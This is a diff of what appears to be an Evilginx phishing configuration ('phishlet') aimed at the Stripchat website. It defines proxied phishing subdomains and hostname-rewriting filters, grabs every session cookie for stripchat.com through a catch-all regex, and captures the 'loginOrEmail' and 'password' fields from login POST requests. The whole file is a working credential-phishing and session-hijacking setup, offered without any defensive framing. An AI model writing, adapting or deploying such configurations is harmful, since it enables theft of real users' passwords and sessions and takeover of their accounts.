--- a/stripchat2.yaml
+++ b/stripchat2.yaml
@@ -1,31 +1,24 @@
-author: 'cwaizydee'
+name: 'stripchat2'
+author: '@cwaizydee'
 min_ver: '2.3.0'
 proxy_hosts:
   - {phish_sub: 'sv', orig_sub: 'sv', domain: 'stripchat.com', session: true, is_landing: true}
- 
-  - {phish_sub: 'www', orig_sub: 'www', domain: 'stripchat.com', session: true, is_landing: false}
-  
-
 sub_filters:
-  - {triggers_on: 'www.stripchat.com', orig_sub: '', domain: 'stripchat.com', search: '{hostname_regex}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
-  - {triggers_on: 'sv.stripchat.com', orig_sub: '', domain: 'stripchat.com', search: '{hostname_regex}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
-  - {triggers_on: 'www.stripchat.com', orig_sub: '', domain: 'stripchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
-  - {triggers_on: 'www.stripchat.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
-  - {triggers_on: 'www.stripchat.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'stripchat.com', orig_sub: 'sv', domain: 'stripchat.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
 auth_tokens:
+  - domain: 'stripchat.com'
+    keys: ['.*,regexp']
   - domain: 'sv.stripchat.com'
-    keys: ['.*,regexp']
-  - domain: '.stripchat.com'
-    keys: ['.*,regexp']
+    keys: ['.*,regexp']    
 credentials:
   username:
-    key: ''
-    search: '"loginOrEmail":"([^"]*)"'
-    type: 'json'
+    key: 'loginOrEmail'
+    search: '(.*)'
+    type: 'post'
   password:
-    key: ''
-    search: '"password":"([^"]*)"'
-    type: 'json'
+    key: 'password'
+    search: '(.*)'
+    type: 'post'
 login:
   domain: 'sv.stripchat.com'
   path: '/login'
